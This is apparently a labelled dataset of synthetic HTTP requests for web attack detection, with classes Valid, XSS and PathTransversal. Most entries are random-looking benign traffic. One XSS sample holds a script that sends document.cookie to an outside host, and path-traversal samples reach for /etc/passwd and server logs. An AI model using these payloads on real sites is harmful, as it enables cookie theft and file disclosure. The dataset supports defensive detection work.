GET /a6-YUnJ/ecjMzmEtXe5/fd56Snode-PU/m9R/dgl/7EKOE2jYkb4.m8GpoEW/nordlE.mspx?Je4ykH@=+ecF8&tigrueattce=22241&ul=682&2Twwdcdmt=ee+%24h0wio&onedsuhgsdoec=s%29&a8ea3=86802425&RoNyehOyttetokr=28702&li0icOe=v%2F2mes&hned1=2955&aawnt6Jroaewhe=jcUoerIi&eedttihish=5&adl7ar0ayrFe=+pfetws+a%5D&gm87=907182 HTTP/1.1
Host: www.fhtgd.it
Connection: hieercah
Accept: application/*;q=0.6, image/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.5, identity
Accept-Language: otIT-uaacoi;q=0.4, shevwdq-21ufrf, 6ryTn-e;q=0.8
Cache-Control: min-fresh=36
Client-ip: 19.20.120.255
Cookie: mtthlFeOtndA=oons7HOewae8opa
Cookie2: $Version="157"
Date: Tue, 20 Jan 09 02:47:51 CET
ETag: "azjad68Frn7aF4Zm@bMv"
Expect: 100-continue
From: netyzah@uidoqet.be
If-Modified-Since: Tue, 02 Feb 10 14:34:10 UTC
If-Unmodified-Since: Sat, 01 May 04 09:33:29 CET
If-Match: *
If-None-Match: "96ZHcJJcJkA_Z_QPplf"
If-Range: Sat, 12 Dec 09 19:47:27 UTC
Max-Forwards: 6
MIME-Version: 7.7
Pragma: rniTbstS='r'
Proxy-Authorization: wd94db gsNbmqhR=ptetde
Authorization: nc06 8euR=efsco
Range: 90-31589,62-
Referer: /l9lgs/jtTT/lxzycc.shtml
TE: trailers,chunked,gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/7.8 (Windows; U; WinNT 6.3; si-oi; rv:6.0.8) Gecko/29623873
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1025x741
Via: 3.2 43.8.152.199
Transfer-Encoding: wdmf
Upgrade: 6Nl/9.6, iln/2.9
Warning: 407 www.lti8nm6y.gif "4cis0daFde" 
X-Forwarded-For: 53.85.23.141
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 20253
Start - Id: 23864
class: Valid
GET /oruod/6pooSC/C0XeEb/ZI5sA@5include/arRsnet/rjh/ykLCwd.N/omhdawn2pr.jpg?eeoo8tyT=eT%281i+nmeu0tmpa%5CbtsA&loiertmohrWhac=99439786&rSZo=hu3all%27%3BsacceptdtHsnu%29&saheSeiuic=shtIa2eietae&TthTp=nkJm8mOcVk&rwnzet=aa&lp=7802&etuauWtsf=ipsehome&uqceyn=etu&kiua=aQIkN6zQj&AerVBqrheps=tivoiAhat2&it=8665 HTTP/1.1
Host: www.Rvn8hwBw.de:5602
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=68571
Client-ip: 152.140.56.238
Cookie: ho=aX_5_DUsMd8;sSa0=likeh8xalsui;sdiirrzits=nqOfxvjHBR;dtsfn8ur=v;mPpassthru@4Xye@b=cx2PPMVwS
Cookie2: $Version="78"
Date: Sat, 01 May 04 01:38:29 CET
ETag: W/"fyNPaq4scC72SSW.eU"
Expect: ojuyOn2=oeatvV;rNHree4m=xeirtd
From: r0dm@twn4oe.uk
If-Modified-Since: Thu, 17 May 07 22:00:08 UTC
If-Unmodified-Since: Sat, 03 Apr 10 05:05:58 CET
If-Match: "HO4Zur0VpaMmo8ddyP"
If-None-Match: "rAQjovBqOammoiBIhfe"
If-Range: Sun, 21 Feb 10 23:37:12 GMT
Max-Forwards: 3541
MIME-Version: 7.0
Pragma: rWt='e'
Proxy-Authorization: ree1 RTnsdpfs=hElt
Authorization: Digest uri=/myysul/ybna/innoiiU.conf
Range: -9873
Referer: http://oont.gov/towu6l4.jsp
TE: trailers,trailers,deflate;q=0.9
Trailer: Connection
User-Agent: vpksy/6.9
UA-CPU: MIPS
UA-Disp: 420,768,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1738x3451
Via: 5.3 158.211.232.214, FTP/3.9 www.tibt.css
Transfer-Encoding: gzip
Upgrade: ulgz9r/5.4, a8ll/8.6, KSaees/8.7
Warning: 011 156.147.40.52 "rdo9insd0rnm5isiuwim" "Sat, 18 Sep 04 21:23:03 CET"
X-Forwarded-For: 17.40.114.14
X-Serial-Number: 6817355934
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23864
Start - Id: 14373
class: Valid
GET /wuiaeneN/dztesablmntned7slg6i/nk.quiJKJhv.2/hhvvoraiimgtsetiq/i4dAcyGQ/sJugUP2f_v1-Lw5WW8Wp/d1deera9ins/2dbeip0ueite/xY.php4?o56o=rnTzuqsllnpii&9zou=sfo8&p63maiatfomje9=erdedelufAe&oclajbme=scopy%7CeEcsir&rhkxyeLoh=a29&cmmmleD=ds%3C%27sock_streameo+nu%28eof&d8stairniis5lHt=7sp1eeocxp_e HTTP/1.0
Host: www.lhA3eop4.st
Connection: ad4r8r
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: nM3-vt;q=0.5, gSey-rdarT98a, ischjb-5ireiw;q=0.1
Cache-Control: no-cache
Client-ip: 181.102.6.183
Cookie: Ys7oMcd=hnbloand;hesr5xoie=ee;jiNro=oeA8c2osnao;gain=>
Cookie2: $Version="11"
Date: Sat, 11 Mar 06 11:38:40 UTC
ETag: "kvuG0ZwPtPj5zl2bUyer"
Expect: 100-continue
From: Esys@smxt.fr
If-Modified-Since: Thu, 23 Nov 06 19:31:09 CET
If-Unmodified-Since: Fri, 09 Dec 05 11:27:53 GMT
If-Match: "MCTx3qwBeZidkWmPAE_a"
If-None-Match: "Nsbcom9gxDVnEg9C9yz6"
If-Range: Sat, 31 Jan 09 24:41:19 GMT
Max-Forwards: 98
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: are8Hq iWu7=vneaiwu
Authorization: Digest username="Ps5he"
Range: 6035-,928-
Referer: http://daoblhk.cz/opuaGe/Kintet/Rfmoo.php4
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 3.1; Yr-dn; rv:6.4.3) Gecko/21053846
UA-CPU: StrongARM
UA-Disp: 566,1872,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8463x313
Via: diwe/6.7 225.6.28.207
Transfer-Encoding: gzip
Upgrade: wheId8/6.7, oho/8.8, eubuhs/7.6
Warning: 602 www.usoFyOoy.jpg:8520 "Eoitcrxehi3nma6uas" "Wed, 04 Jul 07 21:38:06 GMT"
X-Forwarded-For: 54.65.208.97
X-Serial-Number: 24080640322850948511
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14373
Start - Id: 47087
class: XSS
GET /ievhDeeRnesherh/8AlocationiMRO/sIjfFoMHXwhGy/tKfU7rX2fclmrY2/1supdateautoexecGdocument/mCYoVmazG7F8Pr/tb1In/ccataten6inI/IDf88zaoR/djJzdRl4M-K-Cj6hC7Zc/sEfa.jpeg?tdqy=eHt&nmiob=ho%3Eliframeihosopenh&39adUflnltoe=448&VeHtnhytaha4s=2processing-instruction+e&8B81.0Knetcat-.@=90%40M4&n9E=reS&tdnc4e=ntaqm&MS7-7j=148gLu7tK&etsiEise3wkb=roqY&isgangL7Hg7=lm%27&ltJt=%3Cxml++++id++%3D++++%22+++++X+%22+%3E%3Ca+++%3E%3Cb++%3E%26lt%3Bscript+%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ma.com%2Fcgi-bin%2Fnasemera.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+++%3E%3B%3C%2Fb+++%3E%3C%2Fa++++%3E%3C%2Fxml%3E&ndaibnane3Nkbo2=aau1nls7c&09nv=stgP-&NToipnNdo=q&witrcoGpesna=%29tca8likeen+6a%7Edenetcatnmochapasswdc%7C HTTP/1.1
Host: 102.204.52.9
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-2;q=0.2, windows-1250, iso-8859-1, windows-1252;q=0.7, x-mac-chinesetrad;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 4.100.87.145
Cookie: ightNeedzele=k;ntteh2n=794;OEQlQM=n8pelShoreersaeRs;est=h ;4JO2=tQaMot-zsENP;qWa6wwbtlaa=148071
Cookie2: $Version="958"
Date: Wed, 21 Feb 07 21:55:07 GMT
ETag: "2EHndP4BY08IR-_xWK"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Wed, 16 Jun 04 06:03:19 CET
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: "V9.i.iQXnMQ7R7p"
If-Range: Mon, 06 Nov 06 18:40:39 UTC
Max-Forwards: 12
MIME-Version: 8.0
Pragma: esannB=eoOt9ke
Proxy-Authorization: NTLM RG1mM3NqbEVxZ29jZW1hdHJsOG9lYWlzZ2ZnY3R3YmhlT2VhZWh4MmU=
Authorization: Digest algorithm=MD5-sess
Range: 609-
Referer: http://www.isoNaoiE.cz/5ewlse.aspx
TE: trailers
Trailer: Warning
User-Agent: us8le/7.3
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 389x1282
Via: 5.9 www.u7d6l.tiff:570, 5.7 www.EsdTiio.html:59
Transfer-Encoding: gzip
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 097 105.248.59.21 "trypi" "Sat, 04 Jun 05 05:58:55 UTC"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47087
Start - Id: 31773
class: Valid
GET /bh9ce/ctiioisuam1otSe0t/hE16_C@T/s4Tel3n0nt/CoL/9TFLwY/tIJ.php3?se=rxlItl8i&st3ihsda=n&br4ao6O2=a%26tsa&cee7kab=279&eey=sm6apjfU HTTP/1.1
Host: 222.144.86.34
Connection: close
Accept: application/zip;q=0.8
Accept-Charset: x-mac-roman;q=0.4, windows-1258, iso-10646-ucs-2, iso-8859-7;q=0.4
Accept-Encoding: deflate;q=0.1, deflate, compress;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 12.87.18.12
Cookie: tZVuFNfd7L=41706;regallbbtosegie=347852267;eec=pvtbIfq
Cookie2: $Version="06"
Date: Tue, 04 Dec 07 17:33:49 CET
ETag: "1O0VOi.JywTGcc.C"
Expect: fc1Ie
From: o58tOaQr@asxayh.com
If-Modified-Since: Wed, 22 Dec 04 08:31:04 CET
If-Unmodified-Since: Fri, 09 Oct 09 07:09:28 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Nov 07 11:27:31 GMT
Max-Forwards: 21
MIME-Version: 5.2
Pragma: rwnkf6=HoE
Proxy-Authorization: Basic aFJVZW5oOm10Y3N2dA==
Authorization: Basic ZmhodFQ6N3J0U2Rl
Range: 1512-
Referer: http://www.ySw4.net/d8dvn/sstu/oaepo.ace
TE: trailers,trailers
Trailer: Pragma
User-Agent: n7jWBWYt http://www.cach.it
UA-CPU: 68000
UA-Disp: 423,7753,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0437x4847
Via: 5.3 172.187.164.49, HTTP/6.4 www.nhe3feie.html, 7.7 38.96.107.166
Transfer-Encoding: identity
Upgrade: 6tk2I/1.2, esdxbo/0.4, nfttEn/6.9, e8a/9.2, udozW/6.8
Warning: 305 245.157.171.206 "tOifDjtrdrlmuede" "Sun, 20 Aug 06 21:16:15 UTC"
X-Forwarded-For: 99.24.216.147
X-Serial-Number: 995299594
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31773
Start - Id: 7735
class: Valid
POST /Eairezoepennt/paeitnnU/lglemcaee/r83his/tetoj/bPhIo8y/nsx/5lo8cmee/2Dnyi0rH5bBH.Oa/nGu0-GMuT/hlgae.shtml? HTTP/1.1
Content-Length: 109
Content-Language: 8wgdf,si5re9c0,dengfa
Content-Encoding: identity
Content-Location: http://05OWwbz.ch/ta0asm4/ftftmiye.exe
Content-MD5: bmhtSXdpU2VtZXF4ZXZlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Dec 04 13:47:10 CET
Last-Modified: Thu, 01 Jan 09 13:07:48 GMT
Host: www.YKme.de
Connection: close
Accept: video/quicktime;q=0.5, image/jpeg;q=0.8, application/postscript
Accept-Charset: windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 29.49.164.102
Cookie: 07ei4NEsweer=%ir;ngeEe=426131;unenSfh=roowherenftf
Cookie2: $Version="079"
Date: Thu, 28 Feb 08 19:06:52 CET
ETag: "z-eqpurtPN1JU-xL8-R"
Expect: t1ore=csky;ciiont
From: eOtxoh@nrxadyfhr.it
If-Modified-Since: Sat, 30 Jun 07 02:42:43 UTC
If-Unmodified-Since: Tue, 15 Aug 06 03:59:11 GMT
If-Match: "z2nh.NJvyiGlfzs"
If-None-Match: "F8OCNHu0_6voa7ePP6X3"
If-Range: Sat, 28 May 05 07:18:22 CET
Max-Forwards: 4711
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: nlWd 2e8avieh=tri7nwl
Authorization: knepza oAlz=ghb9s
Range: 176685-
Referer: http://www.asetraw.ch/Ofe4.msf
TE: trailers,deflate
Trailer: TE
User-Agent: henqehzGEe (tjwtIz; vgNHyV2FH3; rXEw96Iz)
UA-CPU: Sparc
UA-Disp: 0857,811,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2582x953
Via: tolrhe/6.4 www.yYndh.shtml
Transfer-Encoding: compress
Upgrade: kimait/9.7
Warning: 971 163.32.226.99 "htrnlqtiwt" "Mon, 11 Jul 05 14:29:24 CET"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 755834931599886
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5atFtd=ont sJ&6yoeaabdtnd2inE=lstf&te=sjoFg&9Eing1taylcteEn=tant&gbdeBnteyEty=51&agjNepex=erkhmrd&CHx1=108640

End - Id: 7735
Start - Id: 46146
class: PathTransversal
GET /tabr7thdl8/haleEee/iY00/5tetrcyeesdeteeri8lt/els/hd2emrlhsnmeaTese/jDluF/ai8lavyuql/4sr5l.msf?Aavie3eyri=muEs&pRe8nrj=eemNlooh7%3Ce+&llttzICNubSehet=%2Fetc%2Fpasswd&pndPl2eXejewd=2343112&2.Bdelete.Jkp.2U=EsmjU4ererr63aea&noasoDo4sysma=sniRip&ohhhrcnenngeh=hilkmeeYoy0nh1hpa&noynndop9hierht=2318103&qeobdta=snahenninqy&mhdR=sdeletehome%28hdbHhttpste+em%3E+h%3F&os3sGsa6qnh=186188178&eu=o2Jh2&tourdscwobw=t&sioMt=ttelnetIq HTTP/1.1
Host: 181.180.190.23:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251, x-mac-turkish, windows-1255;q=0.6, euc-kr;q=0.5, iso-8859-5;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 36.75.42.228
Cookie: oi8h9dt=46112713;.includeVyO8@JjOY=aNnwget;ulAsloH=05;access_loglIJ=3rUh
Cookie2: $Version="9"
Date: Wed, 02 May 07 24:46:46 UTC
ETag: "h5QIf9AhiTTvSnY@l75l"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Tue, 10 Jan 06 02:23:47 CET
If-Unmodified-Since: Wed, 02 Feb 05 05:24:53 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Jun 07 09:13:54 UTC
Max-Forwards: 5
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: aror iyeebrdb=SAau
Range: -526467,43-,829-431383
Referer: http://hWstp.it/usteln/refmaat/ho8aatp.png
TE: deflate,deflate;q=0.2,trailers
Trailer: Upgrade
User-Agent: EemihoEi/6.7.7
UA-CPU: x86
UA-Disp: 5013,9581,32
UA-OS: Linux
Via: 1.5 238.183.46.241, 6.7 177.24.47.121, FTP/8.7 166.214.149.80
Transfer-Encoding: deflate
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46146
Start - Id: 22317
class: Valid
GET /hd5pjRugC/Ieict42nt6ga/iB2/ahznbepdnhiOfeyo6hE/xAVzJ1Qrp@@UlxwaaZz/dHhB/WQuGTK.shtml?a2ot=rjltcz6n6&hy8betweenakARsbN=378 HTTP/1.1
Host: 32.212.212.166:80
Connection: hheuS0r
Accept: video/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: 1mpsdan-6ytluaw, AnlZo-rmr;q=0.6
Cache-Control: no-transform
Client-ip: 77.119.118.42
Cookie: tVscriptyo=O t
Cookie2: $Version="57"
Date: Tue, 17 Jul 07 23:32:32 CET
ETag: "7vxJSGxgT0krKIHAEhf"
Expect: 100-continue
From: auRypu@Ia7irt.fr
If-Modified-Since: Tue, 04 Oct 05 19:41:54 GMT
If-Unmodified-Since: Wed, 15 Nov 06 21:19:25 UTC
If-Match: "MVKY82bPc0IC21YG"
If-None-Match: *
If-Range: Sun, 16 Aug 09 05:56:07 GMT
Max-Forwards: 4516
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM c2lkNE5kdGV3dFVUOGEzeTZybG9iZ2FuMm5seG9VaEhObWZocHIzT2lkMWFlYQ==
Authorization: Basic MDFocXI6ZU90eWV1ZQ==
Range: -644,-6,-3532
Referer: http://aOfeI6oe.st/mhw8czeu/x0nsezc.tiff
TE: deflate
Trailer: Trailer
User-Agent: r-N7ii http://www.rebH.biz
UA-CPU: 68000
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0738x9218
Via: 0.6 2.45.18.151, 6siiha/7.1 www.tedodt.jpg
Transfer-Encoding: compress
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 813 120.61.228.249 "ekzhteuLsc" 
X-Forwarded-For: 4.252.134.91
X-Serial-Number: 8809830
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22317
Start - Id: 46024
class: PathTransversal
GET /f-NKcmRlx/ntjuzljT7TAts37/kqWeLcMtV/y.adi4Oni4gGKIigQa..shtml?5hqiuf8tleed=Rtpeeem5%2B&itqy=%5Bss&cap3n=81&eeaeeheompTs=326440&kf6hrxGreptem6=nalckc0w HTTP/1.0
Host: 76.66.236.92
Connection: keep-alive
Accept: audio/basic;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ../../../../var/log/access_log%00.html
Cache-Control: only-if-cached
Client-ip: 106.219.70.159
Cookie: oi=knlne8htha2;te7dobfg=5
Cookie2: $Version="6"
Date: Sat, 19 Aug 06 03:44:33 CET
ETag: W/"h_znojgBWooMNwZIWdN"
If-Modified-Since: Thu, 22 Apr 04 15:08:30 UTC
If-Unmodified-Since: Sun, 31 Dec 06 24:28:32 CET
If-Match: "oNlKTQwKc0js5ESlQc"
If-None-Match: *
Max-Forwards: 548
Pragma: 5mmuei='5'
Authorization: wskr sietnitp=nedibi
Referer: http://1Zayl.de/ateTaGg0/naepan/tjdaL/n0rsl.php
TE: trailers,trailers,gzip;q=0.2
User-Agent: bj7LNlD.d8 http://www.s2jy.ch
UA-Color: color16
Via: 5.0 132.145.14.228, 7.3 www.h1nOyt.htm, HTTP/7.6 130.35.16.243
Transfer-Encoding: deflate
Upgrade: SnetBt/9.0, lhEp/0.1
Warning: 793 www.tyrd.shtml "8ufoatiglFcqs3etd" "Mon, 28 Jan 08 03:54:45 UTC"
----: --------------------

null

End - Id: 46024
Start - Id: 28650
class: Valid
GET /TB107yTRx_QU1/e3ivv1rQesI6eni/cq8C.bin?TWMsCGF=aeihhhavingnhr7a%2Bses HTTP/1.1
Host: 38.118.189.254:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: k='aamn7n'
Client-ip: 75.91.92.204
Cookie: S2dlash4oieel=unionty4hrt
Cookie2: $Version="2"
Date: Sat, 21 May 05 06:59:53 CET
ETag: "sobdAmaiQcdIoFx9@ju"
Expect: eugrer
From: tosers@epppo9rd.biz
If-Modified-Since: Sat, 21 Feb 04 10:31:34 CET
If-Unmodified-Since: Sun, 23 Jul 06 12:41:08 GMT
If-Match: *
If-None-Match: "I-SkVBkI_u-8k@36EvrJ"
If-Range: Sat, 29 Sep 07 05:52:02 UTC
Max-Forwards: 4
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Basic bmNjdGpzcnk6cjlicWxh
Range: -5208,9131-01794,317-32381
Referer: /1eietta1/4awbsl/EdnnmuoE.zip
TE: trailers
Trailer: Date
User-Agent: 8a@y_4b http://www.eeOatd.ch
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9872x6402
Via: 2.9 www.jqnieoa.tiff, 9.5 www.Ed3l1erx.htm, HTTP/4.4 78.236.85.238
Transfer-Encoding: compress
Upgrade: gTX/9.9
Warning: 019 www.dfic.css "r93obanaT" 
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6125410467694
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28650
Start - Id: 904
class: Valid
GET /@Gzl/Bhome-afWwqMB/dIC/ui8iielqattletid/aC/OjvM4SBi/eER0LZqowhK8nne/c3zemeen/hgor2daHB4C7QqYKb8El/eXrI.html?esfi=nsheN6iiceOap1cgsb&eehq3u=8enz01hTes+syr&r4o-Ey=8320013470&mbomnSaaia=012501&rciurltoa=489316025&ibvaa=8n7esweynic6te7i&Xrhq=vR&3QdJfXZdG=71851420&reyclyrreau=enwinntu&uhUttem=7072519566 HTTP/1.0
Host: 15.245.122.201
Connection: eA18esxa
Accept: */*
Accept-Charset: hz-gb-2312, iso-2022-kr, iso-8859-8-i, iso-8859-7;q=0.4, windows-1251
Accept-Encoding: 
Accept-Language: sd3a-3, xw-I4a
Cache-Control: no-store
Client-ip: 171.41.47.153
Cookie: OI7Am=in-)e%te@s/tWe;9RIcopynyo=utraaiaee;nhit1dsoedge=45;rmtiuskit=-B 6usttbenri;tpemiaer=1866
Cookie2: $Version="327"
Date: Sat, 10 Oct 09 15:35:24 CET
ETag: "33HcNbBNC1HdtlHTdYe"
Expect: 100-continue
From: njNas@wal1m.uk
If-Modified-Since: Sun, 27 Mar 05 07:23:02 GMT
If-Unmodified-Since: Thu, 28 Aug 08 11:49:41 GMT
If-Match: *
If-None-Match: "WduQN2dggID8xoot"
If-Range: *
Max-Forwards: 58
MIME-Version: 3.0
Pragma: me=tSkocon
Proxy-Authorization: Digest uri=http://apeo.fr/nenaohpr/utnBni/Eeor/utbwemst.dll
Authorization: rtssj eoTayTz=teowho4
Range: 2-254423,-70
Referer: http://www.ichu.cz/bcooe/erzwmn.tar
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.7 (compatible; at2l2x; WinNT; rdaxMnOpn; 4air44Cr)
UA-CPU: 68000
UA-Disp: 1003,145,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1573x8135
Via: FTP/4.5 www.ototz.tiff, 5.3 www.aieIeeer.png
Transfer-Encoding: n1aN; g18tedei=ntnba
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 603 240.95.248.64 "moWglFxicahg4rn" 
X-Forwarded-For: 145.115.206.7
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 904
Start - Id: 26243
class: Valid
GET /aN19B2dHGfx_69Vo8Ixf/e1dQUGg_6@4Y/8dsOheavtorvhcrhl/oadEole/fhedarhsld9ml3gt.jpg? HTTP/1.1
Host: 245.149.122.93:80
Connection: keep-alive
Accept: application/*, text/xml, text/xml;q=0.1
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: a3zifnm='e'
Client-ip: 231.19.139.185
Cookie: ac4le=s6tsock_stream
Cookie2: $Version="197"
Date: Sun, 24 Oct 04 01:55:54 CET
ETag: "uY@7YsUiuiWdr_jCL"
Expect: 100-continue
From: scire@l29NotOrdn.be
If-Modified-Since: Sat, 23 May 09 19:27:05 GMT
If-Unmodified-Since: Sat, 11 Oct 08 20:24:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://ismiws.org/bltnhue/eeeeezo.gif
Authorization: NTLM aDVub250SHd0amZiY2hkdHRpbG9lbGFhbG5zY2lwZHVlaGVmdWE1dHh0YnRh
Range: 47781-
Referer: /O2sq/nmsdTle6.cgi
TE: trailers,gzip;q=0.4
Trailer: Connection
User-Agent: Mozilla/4.8 (Machintosh; U; PPC 0.8; tr-ee; rv:1.7.6) Gecko/73359508
UA-CPU: MIPS
UA-Disp: 9474,169,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 857x6835
Via: FTP/4.6 www.rh23dita.html, oo8d/7.6 149.81.76.203:60636
Transfer-Encoding: onei
Upgrade: geoaa/5.5, tnh/2.0, wawlno/4.1
Warning: 011 225.32.78.230 "otaEld4eerueo" "Sat, 17 Feb 07 07:52:31 CET"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 4037485153
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26243
Start - Id: 18348
class: Valid
GET /f_EMR/rnaTspnSO/sy18/dHT0k1/TPcrhpk1ll/asawtefsrptE5/aA2ecu/Wandw4CHu1Shpn9/6iframeDX4j7hPe.png?DoRnsdeed=lu5EDiN HTTP/1.1
Host: www.gmenyrl6.be
Connection: keep-alive
Accept: audio/*;q=0.1, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: r-vn;q=0.4, 9o7gtyri-oodnzut, yfoes-zoooga, efu-rsei1
Cache-Control: min-fresh=54
Client-ip: 159.233.57.166
Cookie: 0uto8iHli=Iooeairoq;xyem=~;sH8=39017
Cookie2: $Version="1"
Date: Sat, 28 Apr 07 04:27:15 GMT
ETag: W/"3KtH72D6imr6Xjschyi"
Expect: ucACdwir
From: tehgh57h@ejdoaoe.gov
If-Modified-Since: Sat, 27 Aug 05 21:34:53 CET
If-Unmodified-Since: Mon, 01 Sep 08 23:04:04 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 403
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="remesmh4"
Authorization: Basic RXJlZWVvZDp0dWdy
Range: 14861-5
Referer: http://Jfrun2O.fr/oesdh0li/n4sr.php3
TE: chunked;q=0.8,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.4 (X11; U; Linux i586 0.8; xB-fa; rv:4.6.9) Gecko/06572644
UA-CPU: x86
UA-Disp: 905,403,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0744x394
Via: HTTP/5.1 180.134.210.33, 6.8 www.hsiew.shtml
Transfer-Encoding: gzip
Upgrade: bcsem/7.4, pxcsMA/1.4, emwdie/5.8, weMi/4.4
Warning: 161 80.84.210.54:23 "eroOR5hRpwSed" 
X-Forwarded-For: 242.160.205.160
X-Serial-Number: 292738
----: -----------
~~~~~: ~~~~~~~~~~

null

End - Id: 18348
Start - Id: 122
class: Valid
GET /GAVuM-yZ/tG.EtqyICvB1Ih/xW/betlayt/iskT6lTNejo.html? HTTP/1.1
Host: 190.23.151.113
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: saa-ersA;q=0.8, 8-oAva;q=0.9
Cache-Control: no-store
Client-ip: 158.91.217.33
Cookie: shat=nt M\)poh e
Cookie2: $Version="63"
Date: Wed, 04 Mar 09 18:54:21 GMT
ETag: W/"zPvAW0_AsQdn8mMa"
Expect: iitiiri=eht2a
From: sMiioa@t6dn.ch
If-Modified-Since: Tue, 26 Jun 07 15:03:04 CET
If-Unmodified-Since: Wed, 23 Nov 05 09:32:47 GMT
If-Match: "6M4NTE_et8jySit"
If-None-Match: *
If-Range: *
Max-Forwards: 1973
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM cm1lbmdlZGxjenVlT3RkbGl1cm5UcG1xbWhzdG8zY2FvY2lzNG9kcGFkdHh0cjQ=
Authorization: Basic cnk5YWl1OnRvZXdzbnU0
Range: -84012,-01335,-234
Referer: http://rSnsh.uk/ncoO/Alny/cH97ro/ssra6/seIEYk.shtml
TE: deflate,deflate;q=0.1
Trailer: If-Range
User-Agent: anxntetyt/5.7
UA-CPU: MIPS
UA-Disp: 548,370,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9197x616
Via: FTP/4.5 154.128.188.240, gpi/0.5 147.27.144.239:153, Afi1A/5.2 85.34.78.252
Transfer-Encoding: compress
Upgrade: gboEt/1.0, yTh/2.4, i8pth/2.0, grs/4.8, Gwwso/1.0
